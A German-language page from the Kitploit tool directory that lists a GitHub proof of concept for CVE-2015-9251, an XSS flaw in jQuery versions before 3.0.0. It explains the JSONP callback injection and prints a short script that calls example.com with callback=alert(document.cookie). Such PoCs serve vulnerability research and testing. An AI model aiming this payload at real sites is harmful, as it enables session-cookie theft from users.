Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2015-9251 — PoC für CVE-2015-9251 jQuery kleiner als 3.0.0. | Kitploit
Tools/GitHubGitHub/moften/cve-2015-9251
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmoften/cve-2015-9251

CVE-2015-9251

PoC für CVE-2015-9251 jQuery kleiner als 3.0.0.

Repository anzeigen
2vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2015-9251

[email protected]

PoC für CVE-2015-9251 jQuery älter als 3.0.0.

CVE-2015-9251 - PoC Exploit

Dieses Repository enthält einen Proof of Concept (PoC) für die Schwachstelle CVE-2015-9251 in der Bibliothek jQuery. Die Schwachstelle ermöglicht einen Cross-Site-Scripting-Angriff (XSS) über unsanitisierte JSONP-Aufrufe, da jQuery das Einschleusen von Code in den callback-Parameter in Versionen vor 3.0.0 erlaubt.


Beschreibung

CVE-2015-9251 betrifft jQuery-Versionen vor 3.0.0. Die Schwachstelle wird durch Manipulation des callback-Parameters in einer JSONP-Anfrage ausgenutzt, was die Ausführung beliebigen JavaScript-Codes im Browser des Opfers ermöglichen kann. Dies kann zur Offenlegung sensibler Daten wie Sitzungscookies führen.

Voraussetzungen

  1. Testumgebung: Die anfällige Webanwendung muss eine jQuery-Version kleiner 3.0.0 verwenden.
  2. Webbrowser: Zur Ausführung des PoC und Beobachtung des Exploit-Verhaltens.
  3. Inspektionstool: Die Browser-DevTools sind hilfreich, um die Ergebnisse zu sehen.

Ausführung des PoC

Führen Sie die folgenden Schritte aus, um den PoC auszuführen:

  1. Kopieren und Einfügen des Codes in die Browser-Konsole oder Einbinden in eine HTML-Testseite.

PoC-Code:

root@kitploit:~
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
  // Funktion, die eine Anfrage an einen anfälligen Server simuliert
  $.ajax({
    url: "https://example.com/api?callback=alert(document.cookie)",
    dataType: "jsonp", // JSONP erlaubt Codeausführung in JSONP-Callbacks
    success: function(response) {
      console.log(response);
    }
  });
</script>
Tool herunterladen